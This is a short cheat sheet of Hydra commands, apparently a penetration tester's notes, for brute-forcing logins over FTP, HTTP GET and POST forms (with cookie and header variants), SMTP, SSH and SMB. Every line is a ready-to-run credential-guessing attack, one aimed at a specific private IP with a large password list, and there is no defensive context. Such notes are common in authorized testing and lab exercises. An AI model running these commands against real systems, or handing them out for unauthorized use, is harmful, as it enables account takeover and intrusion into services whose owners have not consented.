% hydra

# FTP ignore hydra.restore; very verbose; stop on found; (-u) rotate usernames not passwords
hydra -I -V -f -L usernames.txt -u -P /usr/share/seclists/Passwords/xato-net-10-million-passwords.txt 192.168.179.46 ftp

# get
hydra -I -V -f -L user.txt -u -P pass.txt <URL> http-get-form "/<login_URL>:username=^USER^&password=^PASS^&Login=Login:<error_message>"

# post
hydra -I -V -f -L user.txt -u -P pass.txt <URL> http-post-form "/<login_URL>:username=^USER^&password=^PASS^:<error_message>"

# post cookie and header
hydra -I -V -f -L user.txt -u -P pass.txt <URL> http-post-form "/<login_URL>:username=^USER^&password=^PASS^:<error_message>:C=/page/cookie:H=X-Foo: Foo"

# smtp thread limit 1
hydra -I -V -f -t 1 -l <username> -P pass.txt <IP> smtp

# ssh thread limit 4
hydra -t 4 -I -V -f -l <username> -P pass.txt <IP> ssh

# smb thread limit 1
hydra -t 1 -I -V -f -l <username> -P pass.txt <IP> smb
